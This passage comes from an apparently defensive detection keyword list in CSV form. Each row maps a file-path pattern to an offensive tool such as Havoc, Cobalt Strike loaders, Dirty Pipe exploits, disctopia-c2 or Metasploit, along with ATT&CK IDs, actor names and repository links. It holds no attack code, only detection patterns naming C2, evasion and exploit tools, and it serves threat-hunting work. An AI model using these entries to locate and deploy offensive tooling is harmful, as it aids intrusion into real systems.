control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/demon.x64.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/demon1.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/demosyscalls.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Dendrobate.git*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.bin*,offensive_tool_keyword,Dendrobate,Dendrobate is a 
framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.csproj*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.exe*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dendron.sln*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/Dent/*/Loader/Loader.go*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/Dent/Dent.go*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/Dent/Loader*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,1,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/DesertFox/archive/*.zip*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*/detail/kali-linux/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/detect_antivirus/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/detect_antivirus/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/detect-hooks.c*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/detect-hooks.cna*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/detect-hooks.h*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z 
-*/Detect-Hooks/*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/DFSCoerce.git*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z -*/dhcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Dialogs/Payload.hpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/dicom-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dicom-ping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dict-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dicts/ftp_default.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/DInjector.git*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*/DInvoke/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/DInvokeResolver/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/dir_brute.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/dirbuster*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/dirbuster/*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/DirCreate2System.git*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*/direct_syscall_amd64.s*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/dirsearch.py*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*/Dirty-Pipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/imfiver/CVE-2022-0847,1,1,N/A,N/A,3,257,74,2023-02-02T02:17:30Z,2022-03-07T18:36:50Z -*/Dirty-Pipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -*/Dirty-Pipe/main/exploit-static*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*/dirtypipez.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/dirtypipez.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,1,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*/dirtypipez.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation 
tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -*/dirtypipez-exploit/*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,1,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*/disctopia.py*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*/disctopia-c2*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*/DiskCryptor.git*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*/dist/fw_walk.*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,1,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -*/distcc-cve2004-2687.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/distopia-test*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,0,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*/dll/inject/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/dllexploit.cpp*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/dllexploit.exe*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z 